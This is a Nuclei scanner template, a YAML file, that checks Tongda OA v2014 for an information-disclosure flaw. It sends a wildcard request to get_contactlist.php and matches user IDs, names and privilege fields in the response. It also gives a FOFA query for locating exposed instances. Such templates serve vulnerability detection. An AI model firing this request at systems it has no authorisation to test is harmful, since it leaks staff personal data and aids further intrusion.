id: tongda-contact-list-exposure

info:
  name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: tongda,oa,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'user_uid":'
          - 'user_name":'
          - 'priv_name":'
        condition: and

      - type: status
        status:
          - 200

# digest: 490a00463044022042cf14f510cd9824fefac0781358bf2bcf98e628a115eaf65b1159bdb5687124022075950c137b4a82e5aee17d9ea6570f448ce536f38a72f351911ca0df4ec7e47f:922c64590222798bb761d5b6d8e72950